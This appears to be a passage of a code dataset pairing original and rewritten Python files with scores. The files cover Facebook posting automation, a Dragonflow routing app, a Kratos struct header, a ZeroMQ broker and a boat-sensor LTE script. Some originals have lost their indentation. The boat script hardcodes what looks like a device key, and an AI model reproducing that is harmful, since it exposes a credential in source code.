        MAX_IMAGES_FACEBOOK so existing callers are unaffected
    :raises SystemExit: when the limit is exceeded
    """
    if max_images is None:
        max_images = MAX_IMAGES_FACEBOOK
    if len(allLocations) > max_images:
        print("Too many Images")
        # `exit()` is injected by the site module and is not guaranteed to
        # exist in every runtime; raising SystemExit is the portable form.
        raise SystemExit(1)
def LeavePage():
    """Return to the home screen, backing out of any open page first.

    The back button is clicked only when it is visible on screen; the
    home button is always pressed afterwards.
    """
    x, y = helper.LocateImage('./facebookImages/back.png')
    # Idiom fix: identity comparison with None (`is not None`), not `!=`.
    if x is not None and y is not None:
        helper.LocateAndClick('./facebookImages/back.png', helper.SMALL_PAUSE)
    helper.LocateAndClick('./facebookImages/home.png', helper.SMALL_PAUSE)
def LocateAddText():
    """Find and click whichever 'add text' button variant is on screen.

    The button has several appearances; reference screenshots are named
    text_01.png .. text_NN.png (NN = TOTAL_TEXT_IMAGES).  The first
    variant located is clicked.

    :raises SystemExit: when none of the variants can be located
    """
    baseLocation = './facebookImages/text_'
    finalLocation = ""
    for i in range(1, TOTAL_TEXT_IMAGES + 1):
        imageLocation = baseLocation + str(i).zfill(2) + ".png"
        x, y = helper.LocateImage(imageLocation)
        if x is not None and y is not None:
            finalLocation = imageLocation
            break
    if finalLocation:
        helper.LocateAndClick(finalLocation, helper.MEDIUM_PAUSE)
    else:
        print("No images match the search")
        # Portable replacement for site-injected exit().
        raise SystemExit(1)
def GotToPage(username):
    """Open the side menu and navigate to *username*'s Facebook page."""
    menu_image = './facebookImages/menu.png'
    page_image = username + "_facebook.png"
    helper.LocateAndClick(menu_image, helper.MEDIUM_PAUSE)
    helper.LocateAndClick(page_image, helper.MEDIUM_PAUSE)
def post(inputJSON):
    """Publish a post (text plus optional images) to a Facebook page.

    Drives the app through screen-scraping (pyautogui/helper), so the
    statement order below mirrors the exact UI flow and must not change.
    NOTE(review): the source dump lost its indentation; the branch
    nesting below is reconstructed — confirm against the original file.

    :param inputJSON: dict with required keys "text" and "type" ("feed"
        or "boost"), plus "user" (page to post to) and optionally
        "images" (list of image locations).  "user" is read but not
        asserted — presumably always present; verify against callers.
    """
    assert "text" in inputJSON
    assert "type" in inputJSON
    # Open Application
    helper.LocateAndClick('./facebookImages/facebookLogo.png', helper.LARGE_PAUSE)
    LeavePage()
    GotToPage(inputJSON["user"])
    # Add Image from Windows
    if "images" in inputJSON:
        helper.GoToImportPage()
        allLocations = inputJSON["images"]
        CheckForImageQuantity(allLocations)
        helper.AddAllImages(allLocations)
        # Return to the app after importing, then scroll back into view.
        helper.LocateAndClick('./common/home.png', helper.SMALL_PAUSE)
        helper.LocateAndClick('./facebookImages/facebookLogo.png', helper.MEDIUM_PAUSE)
        helper.Scroll(-100, 2)
        helper.PauseForEffect(helper.SMALL_PAUSE)
    # Start Post
    helper.LocateAndClick('./facebookImages/create.png', helper.MEDIUM_PAUSE)
    # Attach Image
    if "images" in inputJSON:
        helper.LocateAndClick('./facebookImages/addPhoto.png', helper.MEDIUM_PAUSE)
        allImages = inputJSON["images"]
        for i, image in enumerate(allImages):
            # Click the (i+1)-th tile of the gallery grid by pixel offset.
            helper.LocateAndClick('./facebookImages/gallery.png', helper.MEDIUM_PAUSE, adjY = FACEBOOK_IMAGE_SIZE/2, adjX = (i+1)*FACEBOOK_IMAGE_SIZE)
        helper.LocateAndClick('./facebookImages/next.png', helper.MEDIUM_PAUSE)
    # Add text (Always at the end, else the links can change a lot of things
    LocateAddText()
    pyautogui.write(inputJSON["text"], interval = 0.1)
    # Tweet It Since its Ready
    helper.PauseForEffect(helper.WAIT_WINDOW)
    helper.LocateAndClick('./facebookImages/share.png', helper.MEDIUM_PAUSE)
    if inputJSON["type"] == "feed":
        helper.LocateAndClick('./facebookImages/feed.png', helper.SMALL_PAUSE)
    if inputJSON["type"] == "boost":
        helper.LocateAndClick('./facebookImages/boost.png', helper.SMALL_PAUSE)
    helper.LocateAndClick('./facebookImages/finalShare.png', helper.LARGE_PAUSE)
    helper.PauseForEffect(helper.SMALL_PAUSE)
    LeavePage()
    # Need to delete all the images from the Manager
    # Attach Image
    if "images" in inputJSON:
        # Add Image from Windows
        helper.GoToImportPage()
        helper.LocateAndClick('./common/cancel.png', helper.SMALL_PAUSE)
        CheckForImageQuantity(inputJSON["images"])
        helper.DeleteAllImages(inputJSON["images"])
        helper.LocateAndClick('./common/home.png', helper.SMALL_PAUSE)
from neutron_lib import constants as n_const
from os_ken.ofproto import ether
from oslo_log import log
from dragonflow.controller.apps import l3_base
from dragonflow.controller.common import constants as const
from dragonflow.controller import df_base_app
LOG = log.getLogger(__name__)
class L3ProactiveApp(df_base_app.DFlowApp, l3_base.L3AppMixin):
def packet_in_handler(self, event):
"""Handle packets sent to the controller from OVS """
msg = event.msg
self.router_function_packet_in_handler(msg)
def _add_subnet_send_to_route(self, match, local_network_id, router_port):
"""
Add routing flows. i.e. for packets that are routed with this router
(identified by parameter match), from the given network
(local_network_id) and the router interface (router_port), transmit
the packet to the next step in the pipeline. (Update network ID and
L2 header).
:param match: The match object for the packet
:type match: OFPMatch
:param local_network_id: The destination network ID
:type local_network_id: Integer
:param router_port: The router's egress router interface
:type router_port: RouterInterface
"""
self._add_subnet_send_to_proactive_routing(match, local_network_id,
router_port.mac)
def _add_subnet_send_to_proactive_routing(self, match, dst_network_id,
dst_router_port_mac):
"""
Add routing flows. i.e. for packets that are routed with this router
(identified by parameter match), from the given network
(local_network_id) and the router interface (router_port), transmit
the packet to the next step in the pipeline. (Update network ID and
L2 header).
:param match: The match object for the packet
:type match: OFPMatch
:param dst_network_id: The destination network ID
:type dst_network_id: Integer
:param dst_router_port_mac: The router's egress router interface's MAC
:type dst_router_port_mac: IPAddress.EUI (or representation)
"""
parser = self.parser
ofproto = self.ofproto
actions = []
actions.append(parser.OFPActionDecNwTtl())
actions.append(parser.OFPActionSetField(metadata=dst_network_id))
actions.append(parser.OFPActionSetField(eth_src=dst_router_port_mac))
action_inst = parser.OFPInstructionActions(
ofproto.OFPIT_APPLY_ACTIONS, actions)
goto_inst = parser.OFPInstructionGotoTable(
const.L3_PROACTIVE_LOOKUP_TABLE)
inst = [action_inst, goto_inst]
self.mod_flow(
inst=inst,
table_id=const.L3_LOOKUP_TABLE,
priority=const.PRIORITY_MEDIUM,
match=match)
def _add_port(self, lport):
"""Add port which is not a router interface."""
super(L3ProactiveApp, self)._add_port(lport)
dst_mac = lport.mac
network_key = lport.lswitch.unique_key
port_key = lport.unique_key
for dst_ip in lport.ips:
self._add_forward_to_port_flow(dst_ip, dst_mac,
network_key, port_key)
for address_pair in lport.allowed_address_pairs:
self._add_forward_to_port_flow(
address_pair.ip_address,
address_pair.mac_address,
network_key,
port_key,
)
def _add_forward_to_port_flow(self, dst_ip, dst_mac, network_id, port_key,
priority=const.PRIORITY_HIGH):
"""
Add flows to update the packets L2 header and metadata (reg7/output
register) for the given port, and forward the packet.
Match by its IP and network.
:param dst_ip: The IP of the port
:type dst_ip: netaddr.IPAddress (or representation)
:param dst_mac: The MAC of the port
:type dst_mac: netaddr.EUI (or representation)
:param network_id: The unique key of the network
:type network_id: Integer
:param port_key: The unique key of the port
:type port_id: Integer
:param priority: The priority of the flow
:type priority: Integer
"""
parser = self.parser
ofproto = self.ofproto
if dst_ip.version == n_const.IP_VERSION_4:
match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,
metadata=network_id,
ipv4_dst=dst_ip)
else:
match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IPV6,
metadata=network_id,
ipv6_dst=dst_ip)
actions = []
actions.append(parser.OFPActionSetField(eth_dst=dst_mac))
actions.append(parser.OFPActionSetField(reg7=port_key))
action_inst = parser.OFPInstructionActions(
ofproto.OFPIT_APPLY_ACTIONS, actions)
goto_inst = parser.OFPInstructionGotoTable(const.EGRESS_TABLE)
inst = [action_inst, goto_inst]
self.mod_flow(
inst=inst,
table_id=const.L3_PROACTIVE_LOOKUP_TABLE,
priority=const.PRIORITY_HIGH,
match=match)
def _remove_port(self, lport):
"""Remove port which is not a router interface."""
super(L3ProactiveApp, self)._remove_port(lport)
network_key = lport.lswitch.unique_key
for dst_ip in lport.ips:
self._remove_forward_to_port_flow(dst_ip, network_key)
for address_pair in lport.allowed_address_pairs:
self._remove_forward_to_port_flow(address_pair.ip_address,
network_key)
def _remove_forward_to_port_flow(self, dst_ip, network_id,
priority=const.PRIORITY_HIGH):
"""
Remove the flows (added in #_add_forward_to_port_flow) which update
the packets L2 header and metadata for a given port and forwards the
packet.
:param dst_ip: The IP of the port
:type dst_ip: netaddr.IPAddress (or representation)
:param network_id: The unique key of the network
:type network_id: Integer
:param priority: The priority of the flow
:type priority: Integer
"""
parser = self.parser
ofproto = self.ofproto
if dst_ip.version == n_const.IP_VERSION_4:
match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,
metadata=network_id,
ipv4_dst=dst_ip)
else:
match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IPV6,
metadata=network_id,
ipv6_dst=dst_ip)
self.mod_flow(
table_id=const.L3_PROACTIVE_LOOKUP_TABLE,
command=ofproto.OFPFC_DELETE,
priority=const.PRIORITY_HIGH,
match=match)
def _update_port(self, lport, orig_lport):
"""Update port which is not a router interface."""
if (
set(lport.ips) != set(orig_lport.ips) or
lport.mac != orig_lport.mac or
lport.allowed_address_pairs != orig_lport.allowed_address_pairs
):
self._remove_port(orig_lport)
self._add_port(lport) | dragonflow/controller/apps/l3_proactive.py |
from neutron_lib import constants as n_const
from os_ken.ofproto import ether
from oslo_log import log
from dragonflow.controller.apps import l3_base
from dragonflow.controller.common import constants as const
from dragonflow.controller import df_base_app
LOG = log.getLogger(__name__)
class L3ProactiveApp(df_base_app.DFlowApp, l3_base.L3AppMixin):
    """Proactive L3 app: installs per-port forwarding flows ahead of time
    rather than reacting to individual packet-ins."""

    def packet_in_handler(self, event):
        """Handle packets sent to the controller from OVS """
        msg = event.msg
        self.router_function_packet_in_handler(msg)

    def _add_subnet_send_to_route(self, match, local_network_id, router_port):
        """
        Add routing flows. i.e. for packets that are routed with this router
        (identified by parameter match), from the given network
        (local_network_id) and the router interface (router_port), transmit
        the packet to the next step in the pipeline. (Update network ID and
        L2 header).
        :param match:            The match object for the packet
        :type match:             OFPMatch
        :param local_network_id: The destination network ID
        :type local_network_id:  Integer
        :param router_port:      The router's egress router interface
        :type router_port:       RouterInterface
        """
        self._add_subnet_send_to_proactive_routing(match, local_network_id,
                                                   router_port.mac)

    def _add_subnet_send_to_proactive_routing(self, match, dst_network_id,
                                              dst_router_port_mac):
        """
        Add routing flows. i.e. for packets that are routed with this router
        (identified by parameter match), from the given network
        (local_network_id) and the router interface (router_port), transmit
        the packet to the next step in the pipeline. (Update network ID and
        L2 header).
        :param match:               The match object for the packet
        :type match:                OFPMatch
        :param dst_network_id:      The destination network ID
        :type dst_network_id:       Integer
        :param dst_router_port_mac: The router's egress router interface's MAC
        :type dst_router_port_mac:  IPAddress.EUI (or representation)
        """
        parser = self.parser
        ofproto = self.ofproto
        actions = []
        # Routed hop: decrement TTL, retag the network, rewrite source MAC.
        actions.append(parser.OFPActionDecNwTtl())
        actions.append(parser.OFPActionSetField(metadata=dst_network_id))
        actions.append(parser.OFPActionSetField(eth_src=dst_router_port_mac))
        action_inst = parser.OFPInstructionActions(
            ofproto.OFPIT_APPLY_ACTIONS, actions)
        goto_inst = parser.OFPInstructionGotoTable(
            const.L3_PROACTIVE_LOOKUP_TABLE)
        inst = [action_inst, goto_inst]
        self.mod_flow(
            inst=inst,
            table_id=const.L3_LOOKUP_TABLE,
            priority=const.PRIORITY_MEDIUM,
            match=match)

    def _add_port(self, lport):
        """Add port which is not a router interface."""
        super(L3ProactiveApp, self)._add_port(lport)
        dst_mac = lport.mac
        network_key = lport.lswitch.unique_key
        port_key = lport.unique_key
        for dst_ip in lport.ips:
            self._add_forward_to_port_flow(dst_ip, dst_mac,
                                           network_key, port_key)
        # Allowed-address-pairs get forwarding flows of their own.
        for address_pair in lport.allowed_address_pairs:
            self._add_forward_to_port_flow(
                address_pair.ip_address,
                address_pair.mac_address,
                network_key,
                port_key,
            )

    def _add_forward_to_port_flow(self, dst_ip, dst_mac, network_id, port_key,
                                  priority=const.PRIORITY_HIGH):
        """
        Add flows to update the packets L2 header and metadata (reg7/output
        register) for the given port, and forward the packet.
        Match by its IP and network.
        :param dst_ip:     The IP of the port
        :type dst_ip:      netaddr.IPAddress (or representation)
        :param dst_mac:    The MAC of the port
        :type dst_mac:     netaddr.EUI (or representation)
        :param network_id: The unique key of the network
        :type network_id:  Integer
        :param port_key:   The unique key of the port
        :type port_key:    Integer
        :param priority:   The priority of the flow
        :type priority:    Integer
        """
        parser = self.parser
        ofproto = self.ofproto
        if dst_ip.version == n_const.IP_VERSION_4:
            match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,
                                    metadata=network_id,
                                    ipv4_dst=dst_ip)
        else:
            match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IPV6,
                                    metadata=network_id,
                                    ipv6_dst=dst_ip)
        actions = []
        actions.append(parser.OFPActionSetField(eth_dst=dst_mac))
        actions.append(parser.OFPActionSetField(reg7=port_key))
        action_inst = parser.OFPInstructionActions(
            ofproto.OFPIT_APPLY_ACTIONS, actions)
        goto_inst = parser.OFPInstructionGotoTable(const.EGRESS_TABLE)
        inst = [action_inst, goto_inst]
        self.mod_flow(
            inst=inst,
            table_id=const.L3_PROACTIVE_LOOKUP_TABLE,
            # BUGFIX: the priority parameter was accepted but ignored
            # (PRIORITY_HIGH was hard-coded here).
            priority=priority,
            match=match)

    def _remove_port(self, lport):
        """Remove port which is not a router interface."""
        super(L3ProactiveApp, self)._remove_port(lport)
        network_key = lport.lswitch.unique_key
        for dst_ip in lport.ips:
            self._remove_forward_to_port_flow(dst_ip, network_key)
        for address_pair in lport.allowed_address_pairs:
            self._remove_forward_to_port_flow(address_pair.ip_address,
                                              network_key)

    def _remove_forward_to_port_flow(self, dst_ip, network_id,
                                     priority=const.PRIORITY_HIGH):
        """
        Remove the flows (added in #_add_forward_to_port_flow) which update
        the packets L2 header and metadata for a given port and forwards the
        packet.
        :param dst_ip:     The IP of the port
        :type dst_ip:      netaddr.IPAddress (or representation)
        :param network_id: The unique key of the network
        :type network_id:  Integer
        :param priority:   The priority of the flow
        :type priority:    Integer
        """
        parser = self.parser
        ofproto = self.ofproto
        if dst_ip.version == n_const.IP_VERSION_4:
            match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,
                                    metadata=network_id,
                                    ipv4_dst=dst_ip)
        else:
            match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IPV6,
                                    metadata=network_id,
                                    ipv6_dst=dst_ip)
        self.mod_flow(
            table_id=const.L3_PROACTIVE_LOOKUP_TABLE,
            command=ofproto.OFPFC_DELETE,
            # BUGFIX: use the caller-supplied priority (was hard-coded),
            # so deletes match flows added with a non-default priority.
            priority=priority,
            match=match)

    def _update_port(self, lport, orig_lport):
        """Update port which is not a router interface."""
        # Re-install flows only when something that affects them changed.
        if (
            set(lport.ips) != set(orig_lport.ips) or
            lport.mac != orig_lport.mac or
            lport.allowed_address_pairs != orig_lport.allowed_address_pairs
        ):
            self._remove_port(orig_lport)
            self._add_port(lport)
from kratos import PackedStruct, clog2
from global_buffer.design.global_buffer_parameter import GlobalBufferParams
import math
class GlbHeader():
def __init__(self, _params: GlobalBufferParams):
self._params = _params
self.cfg_data_network_t = PackedStruct("cfg_data_network_t",
[("tile_connected", 1),
("latency", self._params.latency_width)])
self.cfg_pcfg_network_t = PackedStruct("cfg_pcfg_network_t",
[("tile_connected", 1),
("latency", self._params.latency_width)])
self.cfg_dma_ctrl_t = PackedStruct("dma_ctrl_t",
[("mode", 2),
("use_valid", 1),
("data_mux", 2),
("num_repeat", clog2(self._params.queue_depth) + 1)])
# NOTE: Kratos does not support struct of struct now.
dma_header_struct_list = [("start_addr", self._params.glb_addr_width),
("cycle_start_addr", self._params.glb_addr_width)]
dma_header_struct_list += [("dim", 1 + clog2(self._params.loop_level))]
for i in range(self._params.loop_level):
dma_header_struct_list += [(f"range_{i}", self._params.axi_data_width),
(f"stride_{i}", self._params.axi_data_width),
(f"cycle_stride_{i}", self._params.axi_data_width)]
self.cfg_dma_header_t = PackedStruct("dma_header_t", dma_header_struct_list)
# pcfg dma header
self.cfg_pcfg_dma_ctrl_t = PackedStruct("pcfg_dma_ctrl_t", [("mode", 1)])
self.cfg_pcfg_dma_header_t = PackedStruct("pcfg_dma_header_t",
[("start_addr", self._params.glb_addr_width),
("num_cfg", self._params.max_num_cfg_width)])
wr_packet_list = [("wr_en", 1),
("wr_strb", math.ceil(self._params.bank_data_width / 8)),
("wr_addr", self._params.glb_addr_width),
("wr_data", self._params.bank_data_width), ]
rdrq_packet_list = [("rd_en", 1),
("rd_addr", self._params.glb_addr_width), ]
rdrs_packet_list = [("rd_data", self._params.bank_data_width),
("rd_data_valid", 1), ]
self.packet_t = PackedStruct(
"packet_t", wr_packet_list + rdrq_packet_list + rdrs_packet_list)
self.rd_packet_t = PackedStruct(
"rd_packet_t", rdrq_packet_list + rdrs_packet_list)
self.rdrq_packet_t = PackedStruct("rdrq_packet_t", rdrq_packet_list)
self.rdrs_packet_t = PackedStruct("rdrs_packet_t", rdrs_packet_list)
self.wr_packet_t = PackedStruct("wr_packet_t", wr_packet_list)
# NOTE: Kratos currently does not support struct of struct.
# This can become cleaner if it does.
self.wr_packet_ports = [name for (name, _) in wr_packet_list]
self.rdrq_packet_ports = [name for (name, _) in rdrq_packet_list]
self.rdrs_packet_ports = [name for (name, _) in rdrs_packet_list]
self.rd_packet_ports = [name for (name, _) in (
rdrq_packet_list + rdrs_packet_list)]
self.packet_ports = [name for (name, _) in (
rdrq_packet_list + rdrs_packet_list + wr_packet_list)]
self.cgra_cfg_t = PackedStruct("cgra_cfg_t", [("rd_en", 1), ("wr_en", 1), (
"addr", self._params.cgra_cfg_addr_width), ("data", self._params.cgra_cfg_data_width)]) | global_buffer/design/glb_header.py | from kratos import PackedStruct, clog2
from global_buffer.design.global_buffer_parameter import GlobalBufferParams
import math
class GlbHeader():
    """Bundles the packed-struct type definitions shared by the global buffer.

    Kratos has no struct-of-struct support, so composite packets are kept as
    flat field lists plus parallel port-name lists.
    """

    def __init__(self, _params: GlobalBufferParams):
        self._params = _params
        params = _params

        # Network configuration structs (data and parallel-config planes).
        self.cfg_data_network_t = PackedStruct(
            "cfg_data_network_t",
            [("tile_connected", 1), ("latency", params.latency_width)])
        self.cfg_pcfg_network_t = PackedStruct(
            "cfg_pcfg_network_t",
            [("tile_connected", 1), ("latency", params.latency_width)])

        self.cfg_dma_ctrl_t = PackedStruct("dma_ctrl_t", [
            ("mode", 2),
            ("use_valid", 1),
            ("data_mux", 2),
            ("num_repeat", clog2(params.queue_depth) + 1),
        ])

        # Flat DMA header: fixed fields followed by per-loop-level triples.
        dma_fields = [
            ("start_addr", params.glb_addr_width),
            ("cycle_start_addr", params.glb_addr_width),
            ("dim", 1 + clog2(params.loop_level)),
        ]
        for level in range(params.loop_level):
            dma_fields.extend([
                (f"range_{level}", params.axi_data_width),
                (f"stride_{level}", params.axi_data_width),
                (f"cycle_stride_{level}", params.axi_data_width),
            ])
        self.cfg_dma_header_t = PackedStruct("dma_header_t", dma_fields)

        # Parallel-config DMA control and header.
        self.cfg_pcfg_dma_ctrl_t = PackedStruct("pcfg_dma_ctrl_t", [("mode", 1)])
        self.cfg_pcfg_dma_header_t = PackedStruct("pcfg_dma_header_t", [
            ("start_addr", params.glb_addr_width),
            ("num_cfg", params.max_num_cfg_width),
        ])

        # Bank access packets: write, read-request and read-response legs.
        wr_fields = [
            ("wr_en", 1),
            ("wr_strb", math.ceil(params.bank_data_width / 8)),
            ("wr_addr", params.glb_addr_width),
            ("wr_data", params.bank_data_width),
        ]
        rdrq_fields = [
            ("rd_en", 1),
            ("rd_addr", params.glb_addr_width),
        ]
        rdrs_fields = [
            ("rd_data", params.bank_data_width),
            ("rd_data_valid", 1),
        ]
        self.packet_t = PackedStruct(
            "packet_t", wr_fields + rdrq_fields + rdrs_fields)
        self.rd_packet_t = PackedStruct(
            "rd_packet_t", rdrq_fields + rdrs_fields)
        self.rdrq_packet_t = PackedStruct("rdrq_packet_t", rdrq_fields)
        self.rdrs_packet_t = PackedStruct("rdrs_packet_t", rdrs_fields)
        self.wr_packet_t = PackedStruct("wr_packet_t", wr_fields)

        # Port-name lists mirror the field lists above (no struct-of-struct).
        self.wr_packet_ports = [name for name, _ in wr_fields]
        self.rdrq_packet_ports = [name for name, _ in rdrq_fields]
        self.rdrs_packet_ports = [name for name, _ in rdrs_fields]
        self.rd_packet_ports = [name for name, _ in rdrq_fields + rdrs_fields]
        self.packet_ports = [
            name for name, _ in rdrq_fields + rdrs_fields + wr_fields]

        self.cgra_cfg_t = PackedStruct("cgra_cfg_t", [
            ("rd_en", 1),
            ("wr_en", 1),
            ("addr", params.cgra_cfg_addr_width),
            ("data", params.cgra_cfg_data_width),
        ])
import logging
import threading
import zmq
import zmq.auth
from zmq.auth.thread import ThreadAuthenticator
__author__ = "<NAME>"
__copyright__ = "Copyright (c) 2015, Technische Universitat Berlin"
__version__ = "0.1.0"
__email__ = "<EMAIL>"
class Broker(threading.Thread):
"""docstring for Broker"""
def __init__(self,
             xpub="tcp://127.0.0.1:8990",
             xsub="tcp://127.0.0.1:8989",
             server_key=None,
             client_keys=None,
             ):
    """Create the broker thread (sockets are created later, in run()).

    :param xpub: address the XPUB socket binds to
    :param xsub: address the XSUB socket binds to
    :param server_key: path to the server CURVE certificate; CURVE
        encryption/authentication is enabled only when this is given
    :param client_keys: directory of authorized client certificates;
        when None, any client key is accepted (CURVE_ALLOW_ANY)
    """
    self.log = logging.getLogger("{module}.{name}".format(
        module=self.__class__.__module__, name=self.__class__.__name__))
    super(Broker, self).__init__()
    # Loop flag polled by run(); cleared by stop().
    self.running = False
    self.xpub_url = xpub
    self.xsub_url = xsub
    self.ctx = zmq.Context()
    # Authenticator thread; created in run() only when encryption is on.
    self.auth = None
    self.server_key = server_key
    self.client_keys = client_keys
def run(self):
    """Thread body: bind XPUB/XSUB sockets and proxy messages between them.

    Sockets are created here rather than in __init__ so that they live in
    the broker thread.  Runs until stop() clears self.running.
    """
    self.log.debug("Broker starts XPUB:{}, XSUB:{}"
                   .format(self.xpub_url, self.xsub_url))
    self.xpub = self.ctx.socket(zmq.XPUB)
    self.xsub = self.ctx.socket(zmq.XSUB)
    if self.server_key is not None:
        # CURVE security: start an authenticator thread and restrict
        # which client certificates may connect.
        self.auth = ThreadAuthenticator(self.ctx)
        self.auth.start()
        self.auth.allow('127.0.0.1')
        # Tell authenticator to use the certificate in a directory
        if self.client_keys is not None:
            self.auth.configure_curve(domain='*',
                                      location=self.client_keys)
        else:
            # No client-cert directory: accept any client key.
            self.auth.configure_curve(domain='*',
                                      location=zmq.auth.CURVE_ALLOW_ANY)
        self.log.debug("Enabling encryption with certificate: {}"
                       .format(self.server_key))
        server_public, server_secret = zmq.auth.load_certificate(
            self.server_key)
        for sock in [self.xpub, self.xsub]:
            sock.curve_secretkey = server_secret
            sock.curve_publickey = server_public
            sock.curve_server = True  # must come before bind
    self.xpub.bind(self.xpub_url)
    self.xsub.bind(self.xsub_url)
    # self.proxy.start()
    poller = zmq.Poller()
    poller.register(self.xpub, zmq.POLLIN)
    poller.register(self.xsub, zmq.POLLIN)
    self.running = True
    while self.running:
        # 1000 ms poll timeout so a stop() request is noticed promptly.
        events = dict(poller.poll(1000))
        if self.xpub in events:
            # XPUB emits subscription frames; forward them to publishers.
            message = self.xpub.recv_multipart()
            self.log.debug("subscription message: {}".format(message[0]))
            self.xsub.send_multipart(message)
        if self.xsub in events:
            # Published payloads flow the other way, to subscribers.
            message = self.xsub.recv_multipart()
            self.log.debug("publishing message: {}".format(message))
            self.xpub.send_multipart(message)
    # Shutdown: close both sockets, then stop the authenticator if any.
    for sock in [self.xpub, self.xsub]:
        sock.close()
    if self.auth:
        self.auth.stop()
def stop(self):
self.running = False | uniflex/core/broker.py | import logging
import threading
import zmq
import zmq.auth
from zmq.auth.thread import ThreadAuthenticator
__author__ = "<NAME>"
__copyright__ = "Copyright (c) 2015, Technische Universitat Berlin"
__version__ = "0.1.0"
__email__ = "<EMAIL>"
class Broker(threading.Thread):
"""docstring for Broker"""
def __init__(self,
xpub="tcp://127.0.0.1:8990",
xsub="tcp://127.0.0.1:8989",
server_key=None,
client_keys=None,
):
self.log = logging.getLogger("{module}.{name}".format(
module=self.__class__.__module__, name=self.__class__.__name__))
super(Broker, self).__init__()
self.running = False
self.xpub_url = xpub
self.xsub_url = xsub
self.ctx = zmq.Context()
self.auth = None
self.server_key = server_key
self.client_keys = client_keys
def run(self):
self.log.debug("Broker starts XPUB:{}, XSUB:{}"
.format(self.xpub_url, self.xsub_url))
self.xpub = self.ctx.socket(zmq.XPUB)
self.xsub = self.ctx.socket(zmq.XSUB)
if self.server_key is not None:
self.auth = ThreadAuthenticator(self.ctx)
self.auth.start()
self.auth.allow('127.0.0.1')
# Tell authenticator to use the certificate in a directory
if self.client_keys is not None:
self.auth.configure_curve(domain='*',
location=self.client_keys)
else:
self.auth.configure_curve(domain='*',
location=zmq.auth.CURVE_ALLOW_ANY)
self.log.debug("Enabling encryption with certificate: {}"
.format(self.server_key))
server_public, server_secret = zmq.auth.load_certificate(
self.server_key)
for sock in [self.xpub, self.xsub]:
sock.curve_secretkey = server_secret
sock.curve_publickey = server_public
sock.curve_server = True # must come before bind
self.xpub.bind(self.xpub_url)
self.xsub.bind(self.xsub_url)
# self.proxy.start()
poller = zmq.Poller()
poller.register(self.xpub, zmq.POLLIN)
poller.register(self.xsub, zmq.POLLIN)
self.running = True
while self.running:
events = dict(poller.poll(1000))
if self.xpub in events:
message = self.xpub.recv_multipart()
self.log.debug("subscription message: {}".format(message[0]))
self.xsub.send_multipart(message)
if self.xsub in events:
message = self.xsub.recv_multipart()
self.log.debug("publishing message: {}".format(message))
self.xpub.send_multipart(message)
for sock in [self.xpub, self.xsub]:
sock.close()
if self.auth:
self.auth.stop()
def stop(self):
self.running = False | 0.434941 | 0.055797 |
import pycom
import lteHelper
import machine
from machine import I2C
import pytrackHelper
from pytrack import Pytrack
from LIS2HH12 import LIS2HH12
import time
import gc
import sys
import bme280
from ADS1115 import ADS1115
# ***********************************************************
# ourBoatMonitor IOT code for the boat sensor and LTE transmiter
# ***********************************************************
pycom.heartbeat(False)
# Flags to switch on sensors to collect
includeGPS = True
includeBME280 = True
includeADS1115 = True
# Flag to send data via LTE
sendData = True
# Seconds to spend in low power sleep
DEEP_SLEEP_SECONDS = 3600
# Voltage divider adjustment for ADC0
# Send the true voltage to the backend
adc0VRatio = 0.0909
# flag to go into sleep loop (Turn off for testing)
doSleep = True
try:
py = Pytrack()
acc = LIS2HH12()
print("")
# Set deep sleep parameters
py.setup_int_wake_up(True, False)
# Turn off accelerometer
acc.set_odr(0)
gc.collect()
# ******************************************************************
# Collect sensor data, append to the dataList array to be sent via LTE
# ******************************************************************
dataList = []
# Get the Lithium Ion (Li-ion) battery voltage
LIVoltage = py.read_battery_voltage()
dataList.append(("LIVoltage", LIVoltage))
print("LIVoltage", LIVoltage)
# Include GPS reading
if includeGPS:
print("Getting GPS...")
# Get GPS data from pytrack board
gps = pytrackHelper.getGPS(py, 300)
if (gps[0] is not None and gps[1] is not None):
# Create a list of key value pairs to be
# sent by LTE to hologram
dataList.append(("lat", gps[0]))
dataList.append(("lng", gps[1]))
else:
dataList.append(("lat", 0))
dataList.append(("lng", 0))
else:
dataList.append(("lat", 0))
dataList.append(("lng", 0))
# Use i2c bus 1 for additional i2c devices (Otherwise using Bus 0 messes up the deep sleep processing)
i2c = I2C(1, I2C.MASTER, pins=('P10', 'P9'), baudrate=100000)
# Include the BME280 sensor for Temperature, Presure and humidity readings
if includeBME280:
print("BME280")
bme = bme280.BME280(i2c=i2c)
t, p, h = bme.values
dataList.append(("Pressure", p))
dataList.append(("Temperature", t))
dataList.append(("Humidity", h))
else:
dataList.append(("Pressure", 0))
dataList.append(("Temperature", 0))
dataList.append(("Humidity", 0))
# Include ADS1115 sensor for house battery voltage and bilge water level switch settings
if includeADS1115:
adc = ADS1115(i2c, address=0x48)
print("adc.get_voltage(0)", adc.get_voltage(0))
dataList.append(("ADC0", adc.get_voltage(0)/adc0VRatio))
dataList.append(("ADC1", adc.get_voltage(1)))
else:
dataList.append(("ADC0", -99))
dataList.append(("ADC1", -99))
# Turn off extra i2c devices before deep sleep
i2c.deinit()
dataList.append(("GC", gc.mem_free()))
print("dataList:", dataList)
# Connect to LTE and send the list of data items and hologram device key
if sendData:
lteHelper.sendData(dataList, "lQ6Gjc$n")
if doSleep:
# Go into low power sleep
print("Deep sleep for %d seconds..." %
(DEEP_SLEEP_SECONDS))
time.sleep(1)
py.setup_sleep(DEEP_SLEEP_SECONDS)
py.go_to_sleep(gps=False)
else:
print("No sleep - ending...")
except Exception as e:
# Any exceptions we reboot
sys.print_exception(e)
print("Waiting 60 seconds to reboot...")
time.sleep(60)
print('Reboot')
machine.reset() | uPython/main.py | import pycom
import lteHelper
import machine
from machine import I2C
import pytrackHelper
from pytrack import Pytrack
from LIS2HH12 import LIS2HH12
import time
import gc
import sys
import bme280
from ADS1115 import ADS1115
# ***********************************************************
# ourBoatMonitor IOT code for the boat sensor and LTE transmiter
# ***********************************************************
pycom.heartbeat(False)
# Flags to switch on sensors to collect
includeGPS = True
includeBME280 = True
includeADS1115 = True
# Flag to send data via LTE
sendData = True
# Seconds to spend in low power sleep
DEEP_SLEEP_SECONDS = 3600
# Voltage divider adjustment for ADC0
# Send the true voltage to the backend
